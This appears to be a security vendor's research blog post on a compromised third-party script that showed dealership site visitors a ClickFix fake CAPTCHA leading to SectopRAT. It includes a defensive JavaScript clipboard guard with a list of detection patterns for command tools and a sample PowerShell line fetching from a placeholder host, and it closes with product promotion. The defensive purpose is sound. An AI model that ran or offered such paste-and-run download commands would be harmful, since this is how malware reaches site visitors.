SOURCE DEFENSE RESEARCH INTELLIGENCE NEWS
March 25, 2025
THIRD PARTY SERVICE IDOSTREAM[.]COM COMPROMISED; ATTACK VIA SOCIAL ENGINEERING
As recently reported in the media, over a hundred auto dealerships worldwide were compromised by this malicious script, which generated a ClickFix webpage leading to the installation of SectopRAT malware.
ClickFix is a social engineering tactic where cybercriminals deceive users into copying and executing malicious commands, often through deceptive pop-ups, fake error messages, or phishing emails. This method exploits user trust to install malware, steal information, or gain unauthorized system access.
In this case, a seemingly legitimate fake CAPTCHA window appears. However, upon clicking the checkbox, instructions labeled "Verification Steps" emerge, prompting the user to open the command line and paste the clipboard contents—which is the malicious code strategically placed by the compromised script. Once these actions are completed, the malicious code—specifically SectopRAT malware—executes directly on the site visitor's PC. This malware can steal information and even control browser sessions. Additionally, it possesses several anti-virtual machine (VM) and anti-emulator capabilities.
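One way a site owner could detect the clipboard step described above, shown as an added example that is not Source Defense's code. The patterns, function names and sample strings are assumptions, since the page does not give the actual clipboard contents.

```javascript
// Added example. Heuristics, names and sample strings are assumptions.
// Hints that clipboard text is a command meant for Run / a terminal.
const COMMAND_HINTS = [
  /\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|certutil)(\.exe)?\b/i,
  /\b(curl|wget|iwr|irm|invoke-webrequest|invoke-expression|iex)\b/i,
  /\s-(enc|encodedcommand|w(indowstyle)?\s+hidden|nop|noprofile)\b/i,
  /https?:\/\/\S+/i,
];

// Two or more independent hints => treat as a pasted-command lure.
function scoreClipboardText(text) {
  const hits = COMMAND_HINTS.filter((re) => re.test(text)).map((re) => re.source);
  return { suspicious: hits.length >= 2, hits };
}

// Wrap clipboard.writeText so suspicious writes are reported and rejected.
// `clipboard` is navigator.clipboard in a browser; `report` is any callback.
function guardClipboard(clipboard, report) {
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = (text) => {
    const value = String(text);
    const verdict = scoreClipboardText(value);
    if (!verdict.suspicious) return original(value);
    report({ preview: value.slice(0, 80), hits: verdict.hits });
    return Promise.reject(new Error("clipboard write blocked by policy"));
  };
  return clipboard;
}

// Offline demo with a stand-in clipboard and constructed sample strings.
function demo() {
  const written = [];
  const reports = [];
  const fake = { writeText: (t) => { written.push(t); return Promise.resolve(); } };
  guardClipboard(fake, (r) => reports.push(r));
  fake.writeText("https://example.com/inventory/123"); // ordinary share link
  fake.writeText('powershell -NoProfile -Command "iwr https://example.invalid/v"')
    .catch(() => {}); // constructed lure, rejected by the guard
  return { written, reports };
}

console.log(JSON.stringify(demo(), null, 2));
```

In a browser the guard would be installed as `guardClipboard(navigator.clipboard, handler)` before any third-party script loads. It does not cover `document.execCommand('copy')` or `copy` event handlers, which need their own hooks.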
How does Source Defense protect you from such attacks?
Source Defense's proprietary solution features a unique script policy called 'Isolated,' which isolates scripts in a sandbox environment. This isolation ensures that even actions that are traditionally challenging to monitor and prevent, such as the unauthorized redirects used in this attack, are blocked.
Beyond addressing elusive threats like unauthorized redirects, the Source Defense research team proactively identifies and mitigates emerging attack vectors. This commitment ensures that customers remain protected against a wide range of client-side attacks, including digital skimming and formjacking, safeguarding sensitive data and maintaining compliance with security standards.
Any questions? Contact us at: support@sourcedefense.com
For the latest cyber research news, follow us at https://x.com/sdcyberresearch